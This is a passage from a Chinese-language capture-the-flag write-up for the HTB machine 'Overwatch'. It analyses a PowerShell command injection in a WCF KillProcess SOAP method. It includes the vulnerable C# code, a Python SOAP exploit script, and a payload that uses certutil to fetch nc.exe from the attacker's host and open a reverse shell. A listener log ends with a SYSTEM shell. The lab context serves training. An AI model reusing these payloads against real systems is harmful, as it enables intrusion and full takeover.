HREF="http://overwatch.htb:8000/MonitorService?wsdl">http://overwatch.htb:8000/MonitorService?wsdl</A></PRE><P>You can also access the service description as a single file:<BR/><PRE><A HREF="http://overwatch.htb:8000/MonitorService?singleWsdl">http://overwatch.htb:8000/MonitorService?singleWsdl</A></PRE></P></P><P class="intro">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color="blue">class </font><font color="black">Test
</font>{
<font color="blue">    static void </font>Main()
    {
        <font color="black">MonitoringServiceClient</font> client = <font color="blue">new </font><font color="black">MonitoringServiceClient</font>();

<font color="darkgreen">        // Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        // Always close the client.
</font>        client.Close();
    }
}
</PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color="blue">Class </font><font color="black">Test
</font><font color="blue">    Shared Sub </font>Main()
<font color="blue">        Dim </font>client As <font color="black">MonitoringServiceClient</font> = <font color="blue">New </font><font color="black">MonitoringServiceClient</font>()
<font color="darkgreen">        ' Use the 'client' variable to call operations on the service.

</font><font color="darkgreen">        ' Always close the client.
</font>        client.Close()
<font color="blue">    End Sub
</font><font color="blue">End Class</font></PRE></DIV></BODY></HTML>    

将代码丢给ai逆向分析，发现KillProcess拥有命令注入漏洞。

在这堆 XML 中，最核心的机密就是 <xs:element name="KillProcess"> 这一段。它清楚地告诉我们：

1. 方法名：KillProcess
2. 接收参数：一个名为 processName 的字符串（type="xs:string"）。
3. 命名空间：http://tempuri.org/
4. SOAP Action：http://tempuri.org/IMonitoringService/KillProcess

不安全的命令拼接：逆向代码显示，KillProcess 方法接收一个字符串 processName，然后将其直接嵌入到 PowerShell 脚本字符串中：$"Stop-Process -Name {processName} -Force"。

打破执行上下文：在原文中，攻击 Payload 为 a; certutil.exe ...; echo 。

• ; 符号：在 PowerShell 中起到语句终止符的作用。第一个 ; 结束了原本的 Stop-Process 命令。
• 执行 Payload：中间部分插入了攻击者的 certutil 下载命令和 nc.exe 反弹命令。
• echo 占位符：极其关键。因为后端代码会在你的输入后面强行加上 -Force 和 | Out-String。通过在 Payload 末尾加上 ; echo ，原本会被破坏的语法变成了 echo | Out-String，这在 PowerShell 中是合法的，从而确保了整个恶意脚本能够顺利通过解析并执行。

权限优势：由于 overwatch.exe 作为 Windows 服务运行，其默认权限通常为 NT AUTHORITY\SYSTEM。因此，通过该注入点执行的 nc.exe 自动继承了系统最高权限。

public string KillProcess(string processName)
{
    string scriptContents = $"Stop-Process -Name {processName} -Force";
    try
    {
        using (Runspace runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (Pipeline pipeline = runspace.CreatePipeline())
            {
                pipeline.Commands.AddScript(scriptContents);
                pipeline.Commands.Add("Out-String");
                Collection<PSObject> collection = pipeline.Invoke();
                runspace.Close();
                StringBuilder stringBuilder = new StringBuilder();
                foreach (PSObject psObject in collection)
                    stringBuilder.AppendLine(psObject.ToString());
                return stringBuilder.ToString();
            }
        }
    }
    catch (Exception ex)
    {
        return "Error: " + ex.Message;
    }
}

编写exp

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# cat exp.py             
import requests

# FRP 映射到本地的靶机服务地址
url = "http://127.0.0.1:8000/MonitorService"

# 构造 HTTP 请求头，重点是指定 SOAPAction
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": '"http://tempuri.org/IMonitoringService/KillProcess"'
}

# 我们的恶意 Payload（注入点在 processName 中）
# 这里先尝试让靶机 ping 你的 Kali (10.10.15.114) 来验证 RCE
malicious_payload = 'UraOmote; ping 10.10.15.114 -n 3; echo '

# 构造纯手工的 SOAP XML 报文
soap_body = f"""<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <KillProcess xmlns="http://tempuri.org/">
      <processName>{malicious_payload}</processName>
    </KillProcess>
  </s:Body>
</s:Envelope>"""

print("[*] Sending malicious SOAP request...")
try:
    response = requests.post(url, data=soap_body, headers=headers, timeout=10)
    print(f"[+] HTTP Status: {response.status_code}")
    print("[+] Response from server:")
    print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python3 exp.py
[*] Sending malicious SOAP request...
[+] HTTP Status: 200
[+] Response from server:
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><KillProcessResponse xmlns="http://tempuri.org/"><KillProcessResult>&#xD;
Pinging 10.10.15.114 with 32 bytes of data:&#xD;
Reply from 10.10.15.114: bytes=32 time=161ms TTL=63&#xD;
Reply from 10.10.15.114: bytes=32 time=77ms TTL=63&#xD;
Reply from 10.10.15.114: bytes=32 time=75ms TTL=63&#xD;
&#xD;
Ping statistics for 10.10.15.114:&#xD;
    Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),&#xD;
Approximate round trip times in milli-seconds:&#xD;
    Minimum = 75ms, Maximum = 161ms, Average = 104ms&#xD;
-Force&#xD;
&#xD;
</KillProcessResult></KillProcessResponse></s:Body></s:Envelope>

确认命令执行成功。

让靶机下载nc.exe并反弹shell

malicious_payload = (
    'a; certutil.exe -urlcache -split -f http://10.10.15.114/nc.exe C:\\Windows\\Temp\\nc.exe; '
    'C:\\Windows\\Temp\\nc.exe 10.10.15.114 4444 -e cmd.exe; echo '
)

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1 • 10.10.15.114
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from S200401-10.129.6.144-Microsoft_Windows_Server_2022_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Basic, Menu key: Ctrl-D 
[+] Logging to /root/.penelope/S200401~10.129.6.144_Microsoft_Windows_Server_2022_Standard_x64-based_PC/2026_03_03-02_49_26-692.log 📜
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
C:\Software\Monitoring>whoami
whoami
nt authority\system

C:\Software\Monitoring>